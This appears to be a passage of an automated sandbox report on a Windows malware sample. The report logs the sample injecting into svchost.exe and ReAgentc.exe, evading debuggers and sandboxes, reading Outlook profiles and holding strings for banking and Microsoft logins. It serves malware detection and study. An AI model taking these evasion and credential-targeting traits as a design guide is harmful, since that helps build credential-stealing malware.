                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\ReAgentc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic file information: File size 1203712 > 1048576
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: ReAgentc.pdbGCTL source: svchost.exe, 00000002.00000003.2272440534.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582278533.00000000008A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ASmwljQNPNM.exe, 00000003.00000000.2225983344.000000000016E000.00000002.00000001.01000000.00000004.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4581792254.000000000016E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2127830940.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2128127528.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2211883990.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210328248.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.000000000319E000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2306032265.000000000418B000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2303680318.0000000003FDD000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.0000000004340000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.00000000044DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2127830940.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2128127528.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2211883990.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210328248.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.000000000319E000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2306032265.000000000418B000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2303680318.0000000003FDD000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.0000000004340000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.00000000044DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4583138791.000000000496C000.00000004.10000000.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596639604.0000000035A5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4583138791.000000000496C000.00000004.10000000.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596639604.0000000035A5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ReAgentc.pdb source: svchost.exe, 00000002.00000003.2272440534.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582278533.00000000008A8000.00000004.00000020.00020000.00000000.sdmp
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F14B37 LoadLibraryA,GetProcAddress,0_2_00F14B37
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F38945 push ecx; ret 0_2_00F38958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F898C push ebx; ret 2_2_004F898E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004FAA2E push edx; retf 2_2_004FAA42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004FAA33 push edx; retf 2_2_004FAA42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F62A3 push ebp; ret 2_2_004F63DF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F6373 push ebp; ret 2_2_004F63DF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F25E8 push es; ret 2_2_004F2634
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E3640 push eax; ret 2_2_004E3642
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F4677 push esp; ret 2_2_004F4680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F77CC push 2A831C92h; ret 2_2_004F77D7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BDEBCE push ebp; ret 3_2_03BDEC3A
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BE3289 push edx; retf 3_2_03BE329D
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BDEAFE push ebp; ret 3_2_03BDEC3A
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BE11E7 push ebx; ret 3_2_03BE11E9
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BE0027 push 2A831C92h; ret 3_2_03BE0032
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BDAE43 push es; ret 3_2_03BDAE8F
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BD047F pushad ; ret 3_2_03BD0480
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F148D7
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F95376
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F33187
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeAPI/Special instruction interceptor: Address: 17A9564
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\ReAgentc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\ReAgentc.exeWindow / User API: threadDelayed 9828Jump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ReAgentc.exe TID: 5688Thread sleep count: 145 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exe TID: 5688Thread sleep time: -290000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exe TID: 5688Thread sleep count: 9828 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exe TID: 5688Thread sleep time: -19656000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe TID: 6188Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe TID: 6188Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe TID: 6188Thread sleep time: -55500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe TID: 6188Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe TID: 6188Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ReAgentc.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F7445A
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7C6D1 FindFirstFileW,FindClose,0_2_00F7C6D1
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F7C75C
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F7EF95
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F7F0F2
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F7F3F3
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F737EF
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F73B12
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F7BCBC
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F149A0
                Source: 2A0t0GI.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 2A0t0GI.4.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 2A0t0GI.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 2A0t0GI.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ASmwljQNPNM.exe, 00000006.00000002.4582426666.000000000123F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                Source: 2A0t0GI.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 2A0t0GI.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 2A0t0GI.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 2A0t0GI.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2600327320.0000025D359DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
                Source: 2A0t0GI.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 2A0t0GI.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 2A0t0GI.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 2A0t0GI.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 2A0t0GI.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 2A0t0GI.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 2A0t0GI.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 2A0t0GI.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 2A0t0GI.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 2A0t0GI.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F7C03 LdrLoadDll,2_2_004F7C03
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F83F09 BlockInput,0_2_00F83F09
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F13B3A
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00F45A7C
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F14B37 LoadLibraryA,GetProcAddress,0_2_00F14B37
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_017A81B0 mov eax, dword ptr fs:[00000030h]0_2_017A81B0
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_017A97D0 mov eax, dword ptr fs:[00000030h]0_2_017A97D0
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_017A9830 mov eax, dword ptr fs:[00000030h]0_2_017A9830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
